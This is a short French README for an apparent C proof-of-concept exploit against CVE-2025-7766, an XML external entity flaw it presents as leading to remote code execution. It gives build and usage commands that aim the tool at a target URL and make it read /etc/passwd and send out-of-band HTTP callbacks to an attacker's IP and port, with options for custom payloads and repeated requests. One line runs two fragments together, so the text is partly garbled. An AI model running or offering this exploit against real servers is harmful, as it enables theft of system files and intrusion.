
Exploit PoC basé sur C pour CVE-2025-7766 démontrant XXE-to-RCE via lecture de fichier et rappels HTTP hors bande. Prend en charge les charges utiles XML personnalisées et les requêtes répétées.
PoC pour l'exploitation d'une vulnérabilité d'entité externe XML dans CVE-2025-7766. Démontre la lecture de fichier (/etc/passwd) et les rappels HTTP hors bande.
Auteur : Byte Reaper
CVE : CVE-2025-7766
Vulnérabilité : Exécution de code à distance via une entité externe XML (XXE)
/etc/passwd depuis la cible.gcc -o exploit exploit.c argparse.c -lcurl
# Charge utile de lecture de fichier
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT
# Charge utile de requête hors bande
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -r
# Charge utile personnalisée
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -b '<VOTRE_XML_PERSONNALISÉ>'
# Répéter les requêtes 5 fois
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -r -l 5
# Sortie verbeuse
./exploit -u http://cible/xml -i VOTRE_IP -p VOTRE_PORT -v
MIT